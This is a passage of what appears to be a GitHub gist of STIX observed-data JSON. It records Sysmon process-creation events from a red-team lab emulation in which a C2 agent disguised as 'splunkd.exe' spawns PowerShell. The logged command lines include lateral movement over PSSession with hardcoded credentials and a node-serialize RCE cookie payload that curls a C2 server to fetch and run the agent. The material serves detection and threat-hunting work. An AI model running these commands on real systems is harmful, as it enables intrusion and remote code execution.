| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 6816, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$job = Start-Job -ScriptBlock { $username = \\\"user\\\"; $password = \\\"redlab\\\"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr; $session = New-PSSession -ComputerName \\\"192.168.56.112\\\" -Credential $cred; $location = \\\"C:\\Users\\Public\\splunkd.exe\\\"; Copy-Item $location -Destination \\\"C:\\Users\\Public\\splunkd.exe\\\" -ToSession $session; Start-Sleep -s 5; Remove-PSSession -Session $session;};Receive-Job -Job $job -Wait;\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$job = Start-Job -ScriptBlock { $username = \"user\"; $password = \"redlab\"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr; $session = New-PSSession -ComputerName \"192.168.56.112\" -Credential $cred; $location = \"C:\\Users\\Public\\splunkd.exe\"; Copy-Item $location -Destination \"C:\\Users\\Public\\splunkd.exe\" -ToSession $session; Start-Sleep -s 5; Remove-PSSession -Session $session;};Receive-Job -Job $job -Wait;" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4d07-62e1-5102-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:34:47.004Z", | |
| "last_observed": "2022-07-27T14:34:47.004Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--8a1b3cc2-38db-4888-8b31-af67bbaa78be", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.784Z", | |
| "modified": "2022-07-28T16:05:45.784Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$username = \"user\";$password = \"redlab\";$secstr = New-Object -TypeName System.Security.SecureString;$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;$session = New-PSSession -ComputerName 192.168.56.112 -Credential $cred;Invoke-Command -Session $session -ScriptBlock{cmd.exe /c start C:\\Users\\Public\\splunkd.exe -server http://192.168.56.150:8888 -group red} -AsJob;" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4d3b-62e1-5402-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 7028, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$username = \\\"user\\\";$password = \\\"redlab\\\";$secstr = New-Object -TypeName System.Security.SecureString;$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;$session = New-PSSession -ComputerName 192.168.56.112 -Credential $cred;Invoke-Command -Session $session -ScriptBlock{cmd.exe /c start C:\\Users\\Public\\splunkd.exe -server http://192.168.56.150:8888 -group red} -AsJob;\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:35:46.549230986Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:35:40.220Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 7028, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$username = \\\"user\\\";$password = \\\"redlab\\\";$secstr = New-Object -TypeName System.Security.SecureString;$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;$session = New-PSSession -ComputerName 192.168.56.112 -Credential $cred;Invoke-Command -Session $session -ScriptBlock{cmd.exe /c start C:\\Users\\Public\\splunkd.exe -server http://192.168.56.150:8888 -group red} -AsJob;\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$username = \"user\";$password = \"redlab\";$secstr = New-Object -TypeName System.Security.SecureString;$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;$session = New-PSSession -ComputerName 192.168.56.112 -Credential $cred;Invoke-Command -Session $session -ScriptBlock{cmd.exe /c start C:\\Users\\Public\\splunkd.exe -server http://192.168.56.150:8888 -group red} -AsJob;" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4d3b-62e1-5402-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:35:39.031Z", | |
| "last_observed": "2022-07-27T14:35:39.031Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--04dd13ab-e0c7-4876-8b20-7f834105e49c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.784Z", | |
| "modified": "2022-07-28T16:05:45.784Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "whoami" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b73-62e1-2f02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 6504, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C whoami", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:28:11.556860677Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:28:05.204Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 6504, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C whoami", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "whoami" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b73-62e1-2f02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:28:03.800Z", | |
| "last_observed": "2022-07-27T14:28:03.800Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--20738204-dd51-40d2-a09b-2ae81c339662", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.784Z", | |
| "modified": "2022-07-28T16:05:45.784Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$vuln_server = \"192.168.56.91\";$c2_uri = \"http://192.168.56.150:8888\";$cmd = \"curl -s -X POST -H \\`\"file:sandcat.go\\`\" -H \\`\"platform:linux\\`\" $c2_uri/file/download > splunkd;chmod +x splunkd;./splunkd -server $c2_uri -group red -v\";$payload = \"{\"\"username\"\":\"\"injected\"\",\"\"rce\"\":\"\"_`$`$ND_FUNC`$`$_function anonymous() {\\nrequire('child_process').exec('$cmd', function(error, stdout, stderr) { console.log(stdout) });\\n}()\"\"}\";$payload_b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload));$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession;$cookie = New-Object System.Net.Cookie(\"profile\", $payload_b64, \"/\", $vuln_server);$session.Cookies.Add($cookie);$Response = DNS-Lookup -Uri \"http://$vuln_server\" -WebSession $session;Write-Output $Response;" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4ddf-62e1-5702-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 7880, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$vuln_server = \\\"192.168.56.91\\\";$c2_uri = \\\"http://192.168.56.150:8888\\\";$cmd = \\\"curl -s -X POST -H \\`\\\"file:sandcat.go\\`\\\" -H \\`\\\"platform:linux\\`\\\" $c2_uri/file/download > splunkd;chmod +x splunkd;./splunkd -server $c2_uri -group red -v\\\";$payload = \\\"{\\\"\\\"username\\\"\\\":\\\"\\\"injected\\\"\\\",\\\"\\\"rce\\\"\\\":\\\"\\\"_`$`$ND_FUNC`$`$_function anonymous() {\\nrequire('child_process').exec('$cmd', function(error, stdout, stderr) { console.log(stdout) });\\n}()\\\"\\\"}\\\";$payload_b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload));$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession;$cookie = New-Object System.Net.Cookie(\\\"profile\\\", $payload_b64, \\\"/\\\", $vuln_server);$session.Cookies.Add($cookie);$Response = DNS-Lookup -Uri \\\"http://$vuln_server\\\" -WebSession $session;Write-Output $Response;\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:38:31.249291675Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:38:24.877Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 7880, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$vuln_server = \\\"192.168.56.91\\\";$c2_uri = \\\"http://192.168.56.150:8888\\\";$cmd = \\\"curl -s -X POST -H \\`\\\"file:sandcat.go\\`\\\" -H \\`\\\"platform:linux\\`\\\" $c2_uri/file/download > splunkd;chmod +x splunkd;./splunkd -server $c2_uri -group red -v\\\";$payload = \\\"{\\\"\\\"username\\\"\\\":\\\"\\\"injected\\\"\\\",\\\"\\\"rce\\\"\\\":\\\"\\\"_`$`$ND_FUNC`$`$_function anonymous() {\\nrequire('child_process').exec('$cmd', function(error, stdout, stderr) { console.log(stdout) });\\n}()\\\"\\\"}\\\";$payload_b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload));$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession;$cookie = New-Object System.Net.Cookie(\\\"profile\\\", $payload_b64, \\\"/\\\", $vuln_server);$session.Cookies.Add($cookie);$Response = DNS-Lookup -Uri \\\"http://$vuln_server\\\" -WebSession $session;Write-Output $Response;\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$vuln_server = \"192.168.56.91\";$c2_uri = \"http://192.168.56.150:8888\";$cmd = \"curl -s -X POST -H \\`\"file:sandcat.go\\`\" -H \\`\"platform:linux\\`\" $c2_uri/file/download > splunkd;chmod +x splunkd;./splunkd -server $c2_uri -group red -v\";$payload = \"{\"\"username\"\":\"\"injected\"\",\"\"rce\"\":\"\"_`$`$ND_FUNC`$`$_function anonymous() {\\nrequire('child_process').exec('$cmd', function(error, stdout, stderr) { console.log(stdout) });\\n}()\"\"}\";$payload_b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload));$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession;$cookie = New-Object System.Net.Cookie(\"profile\", $payload_b64, \"/\", $vuln_server);$session.Cookies.Add($cookie);$Response = DNS-Lookup -Uri \"http://$vuln_server\" -WebSession $session;Write-Output $Response;" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4ddf-62e1-5702-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:38:23.087Z", | |
| "last_observed": "2022-07-27T14:38:23.087Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3c503fe7-102d-482f-842f-641f757c6087", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.785Z", | |
| "modified": "2022-07-28T16:05:45.785Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$env:username" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4e17-62e1-5802-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 6880, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C $env:username", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:39:26.825122272Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:39:20.496Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment